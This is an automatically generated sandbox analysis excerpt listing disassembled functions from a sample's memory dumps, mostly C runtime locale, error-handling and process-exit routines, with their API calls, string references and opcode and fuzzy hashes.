Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 024B00C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,024B009C,00000000,00457970,0000000C,024B01F3,00000000,00000002,00000000), ref: 024B00E7
TerminateProcess.KERNEL32(00000000,?,024B009C,00000000,00457970,0000000C,024B01F3,00000000,00000002,00000000), ref: 024B00EE
ExitProcess.KERNEL32 ref: 024B0100

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 95932424b35fdc48ef32caea22904eb5f79d0b41f21831d588972a229f0582b9
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: 59E04631000148ABCF126F58DD48A8A3B6AEF02B43F008029F9048B230CB36DA42DE60

Function 0248092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0248095F
GetProcAddress., xrefs: 024809DC, 024809DF, 024809E4
l, xrefs: 02480966

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 8cdf4942245fb07499dfcbfde2d2b629970e6a449e81b357afbaf2dd344a87d1
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 1A314AB6920609DFDB11DF99C880AAEBBF9FF48324F15504AD841A7310D771EA49CFA4

Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00438ABC

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58

Function 024B8C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 024B8D23

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction ID: ef7cfa2c2ca28fde2ac285df64f04ce911cd4a5a5425e5492c23fff357f6b6b8
Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction Fuzzy Hash: 6E411576900219AECB209FB9CC88EEB77BDEF80715F14466AE905D7280E7319D81CB60

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 024AED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: 2217916c504f1f1d1b273bf3e4caba0a0b36402970917dedf2fb6aebb3c01604
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: C7022D71E012199FDF14CFA9C9906AEBBF1EF98314F15826AD919E7380D731A945CF80

Function 02482605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0248262C
PostQuitMessage.USER32(00000000), ref: 024827CA

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: f0261b97a0c40fe91b5043467f19790d747a5e6a9800cc3e9b6adf87d4469498
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 07412125964384A5E731FFA5BC45B2637B0FF64B26F10252BD528CB2B2E3B28540C75E

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 024B6F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024B6F21,?,?,00000008,?,?,024BF3E2,00000000), ref: 024B7153

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 2c4f3313a7d70be27a4a72d45cf7591d85ca2a479e0586fbe5880f57e6a85a08
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 00B150325106089FD716CF28C486BA5BBE1FF45368F25865AE89ACF3A1C335D992CF50

Function 00B040B7 Relevance: 1.6, Strings: 1, Instructions: 353COMMON

Download Yara Rule

Strings

"~=, xrefs: 00B040E2

Memory Dump Source

Source File: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_af9000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID: "~=
API String ID: 0-2564214703
Opcode ID: e1cdae3e91137000f2f7a12cfec0716f0b2a7225700adeaa942323143ea5ec27
Instruction ID: cb3127284ff060da3dccbfc5e6bd904f0007fe0bc7c71d894d8262838d19fd72
Opcode Fuzzy Hash: e1cdae3e91137000f2f7a12cfec0716f0b2a7225700adeaa942323143ea5ec27
Instruction Fuzzy Hash: ADB187B29593925FCB228F78CC965A97FF0EE6332435806DED5E08B493D3249947CB81

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 024BB8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

Part of subcall function 024B2141: _free.LIBCMT ref: 024B21A0
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024BB900

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: 3e58ed383412d02b6093fc32fb4da5b0817d2288ecdfd0a8e0b2537ca30c963a
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: ED218E3295020AABDF26AE29DC41BFA77ADEF08318F10017BED01D6250EB799945CB60

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 024BB534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024B0A1C,?,024BBC89,00000000,?,?,?), ref: 024BB5A6

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: 7e515b8481e1f4e6acfecb63905f49a3f367a1b8ffb0b433585ee7fb32156f02
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: 6111E53A2007059FDB199F39C8A16BBBB92FF8475CB15482EDE8687B40D771B942CB50

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 024BBADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024BB87A,00000000,00000000,?), ref: 024BBB08

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: 22e2ff09c2b26448e486839dd22a166a8aee82b80c065b84543dbf6df423df52
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: B5F0F932A141156BDB299A29CC45BFB7758EF4071CF04046ADD05A3644EB70FE42CAE0

Function 024BB8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

Part of subcall function 024B2141: _free.LIBCMT ref: 024B21A0
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024BB900

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction ID: 4874e0f95e83d3b1db8e53096fb058bde8b60cfc21e2aa9fb6e959dd9512313b
Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction Fuzzy Hash: 3C014432B512049BCB15EF38DC80AFA73A9DF08311F0442BFEE02DB281EA759D048B60

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 024BB5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024B0A1C,?,024BBC4D,024B0A1C,?,?,?,?,?,024B0A1C,?,?), ref: 024BB61B

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: 605a5bdb758170fdeb429ac795dbbfafa2a361accdca591ab408f29a21a6ed8b
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: F7F0C2363007045FDB265F39DC81BBA7B95EF8076CF15442EFE058B650D7B19C028A64

Function 024B5427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024B047A,?,00000004), ref: 024B547A

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: cc8a1ba2b889b976d33af3994c7ba25a8026f038811202c10f4acefb457fe579
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: 1AF0BB31680318BFDB126F61DC01FAEBB66EF04F12F90415AFD0567290DA719D21AA99

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 024B5034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024AE654: RtlEnterCriticalSection.NTDLL(02030DAF), ref: 024AE663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024B506C

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: 51751c5df23070daea4d4afeea8e2ce78f22671b216f8f8e3d5e9a705c77af24
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: F0F04932A20304DFEB10EF69D905B9D7BE1AF15721F10426AF914DB2E1CB799944CF4A

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 024BB4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024BBCAB,024B0A1C,?,?,?,?,?,024B0A1C,?,?,?), ref: 024BB520

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: 94eb1a1080926b880cd2fcfe5aca514b8a473e9c33ffa5188d5fdf0a06bed6ba
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: D7F0E53A30020957CB099F3ADC557ABBF94EFC1754B5A405EEF0A8B290D7759942CBA0

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

